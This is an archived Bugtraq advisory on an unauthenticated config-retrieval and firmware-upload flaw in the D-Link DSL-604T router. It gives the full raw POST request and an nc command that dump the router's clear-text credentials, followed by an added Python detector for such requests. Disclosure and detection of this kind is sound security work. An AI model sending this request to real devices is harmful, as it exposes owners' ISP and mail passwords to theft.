Bugtraq mailing list archives
504T and now also 604T remote access.
From: alessandro <alessandro () sideralis net>
Date: Sat, 28 May 2005 16:34:20 +0200
Dear ZARAZA, the problem pointed out by Francesco Orro is completely different from the one I had. Yes, the file is the same, but if you continue reading, you can see what I just said: the two bugs are completely different. The one I've described can be used even if it is not the first access to the router, the opposite of what is written in Orro's mail; the method of exploitation is different too. Anyway, I found that D-Link tried to fix this bug in the DSL-604T series, but it seems that it didn't do so well. Here is another post about this other bug:

Device: CUSTOMER=DLinkEU MODEL=DSL-604T
Version: only tested with VERSION=V1.00B02T02.EU.20040610
Bugs:
 i) remote firmware upgrade without password
 ii) config retrieval without password
Exploitation: remote
Date: 27/05/2005
Status: vendor contacted
Workaround: disable remote web management
Author: Alessandro Audero

The Bug

DSL-604T is a D-Link router/ADSL modem with a Linux system on it based on MIPS 4KEc V4.8. This is the uname that I found on the device I tested:

Linux version 2.4.17_mvl21-malta-mips_fp_le (tiger () fd7 alphanetworks com) (gcc version 2.95.3 20010315 (release/MontaVista)) #71 Tue Feb 17 01:16:45 GMT 2004

It supports a remote web management console that at first sight asks for a username and a password. The URL should be something like this:

http://ipaddress/

and if you click on 'login' you'll get this other URL:

http://ipaddress/cgi-bin/webcm

which obviously tells you that you have typed in a wrong password. This router seems to fix the previous 504T vulnerability, denying directory listing of /cgi-bin/ and calling firmwarecfg from a password-protected page. But if you look at the source of the frame

http://ipaddress/cgi-bin/webcm?getpage=../html/tools/updgateway.htm

you can see that firmwarecfg is called with a POST and that this action is allowed even if you don't know any password. Configuration and password retrieval is in this way possible. You can use a POST like this:

POST /cgi-bin/firmwarecfg HTTP/1.1\r\n
Host: 192.168.8.4\r\n
User-Agent: yeah\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n
Content-Length: 234\r\n
\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="config.x"\r\n
\r\n
\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="config.y"\r\n
\r\n
\r\n
-----------------------------41184676334--\r\n
\r\n

Saving this stuff in a file and then doing something like this:

cat lamepost.txt | nc ipaddress 80 > ipaddress.config.xml

you have the router config in ipaddress.config.xml. Same trick as in the previous paper: username and password are written in clear text, even those of the internet provider, mail, etc.

That's all, folks.

Alessandro Audero
Rhapsody
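The request above has a recognisable shape, and a defender who cannot patch the device can at least spot it. The following is an added example written for this archive page, not the advisory author's code: a small classifier that takes a reassembled raw HTTP request plus the client address (as an inline proxy, IDS or reverse proxy in front of the management port would have them) and flags two things the advisory makes actionable: any access to /cgi-bin/firmwarecfg from outside the LAN (the workaround says remote management should be off), and a credential-less POST to it whose multipart body carries the config.x/config.y fields from the quoted request. The path and field names come from the advisory; the LAN range, the hypothesis that a legitimate session would carry an Authorization or Cookie header, and the sample requests are constructed assumptions. The sample POST is rebuilt byte for byte so that its body length matches the advisory's Content-Length of 234.

```python
"""Detection helper for the DSL-604T firmwarecfg weakness described above.
Added example, not the advisory author's code. Assumes the caller already
has the reassembled raw request bytes and the client IP (e.g. from an
inline proxy or IDS). Path and form-field names are from the advisory; the
LAN range and the credential-header heuristic are assumptions."""

import re
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Tuple

FIRMWARECFG_PATH = "/cgi-bin/firmwarecfg"
CONFIG_FIELDS = {"config.x", "config.y"}   # form fields from the advisory's POST
LAN_NET = "192.168.8.0/24"                 # assumed LAN side of the router


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body


def multipart_field_names(content_type: str, body: bytes) -> List[str]:
    """Return the form-data field names found in a multipart body, in order."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        return []
    delim = b"--" + m.group(2).encode("iso-8859-1")   # body lines carry two extra dashes
    names = []
    for part in body.split(delim):
        hit = re.search(rb'name="([^"]+)"', part)
        if hit:
            names.append(hit.group(1).decode("iso-8859-1"))
    return names


def classify(raw: bytes, src_ip: str, lan_net: str = LAN_NET) -> Optional[str]:
    """Return a finding for firmwarecfg requests that violate the workaround
    (remote management) or arrive without credentials; None otherwise."""
    method, path, headers, body = parse_request(raw)
    if path != FIRMWARECFG_PATH:
        return None
    if ip_address(src_ip) not in ip_network(lan_net):
        return "remote access to firmwarecfg: remote web management is enabled"
    if "authorization" in headers or "cookie" in headers:
        return None          # credentials presented (assumed session form); outside this rule
    if method != "POST":
        return None
    fields = set(multipart_field_names(headers.get("content-type", ""), body))
    if fields & CONFIG_FIELDS:
        return "unauthenticated config retrieval via firmwarecfg"
    return "unauthenticated POST to firmwarecfg (possible firmware upload)"


# Constructed sample: the advisory's POST, rebuilt so the body is exactly 234 bytes.
BOUNDARY = "-" * 27 + "41184676334"
_PART = b"\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n\r\n"
SAMPLE_BODY = (
    b"--" + BOUNDARY.encode() + _PART % b"config.x"
    + b"--" + BOUNDARY.encode() + _PART % b"config.y"
    + b"--" + BOUNDARY.encode() + b"--\r\n"
)
SAMPLE_POST = (
    b"POST /cgi-bin/firmwarecfg HTTP/1.1\r\n"
    b"Host: 192.168.8.4\r\n"
    b"User-Agent: yeah\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY.encode() + b"\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
    b"\r\n" + SAMPLE_BODY
)
# Constructed benign request for comparison: the login page itself.
SAMPLE_LOGIN_GET = b"GET /cgi-bin/webcm HTTP/1.1\r\nHost: 192.168.8.4\r\n\r\n"

if __name__ == "__main__":
    for label, req, src in [("lan post", SAMPLE_POST, "192.168.8.23"),
                            ("wan post", SAMPLE_POST, "203.0.113.9"),
                            ("login get", SAMPLE_LOGIN_GET, "192.168.8.23")]:
        print(f"{label}: {classify(req, src)}")
```

The remote-source check fires first because it is the one condition that does not depend on guessing how the firmware tracks sessions; the credential heuristic only matters for LAN clients, where an unauthenticated pull of the clear-text config is still worth an alert.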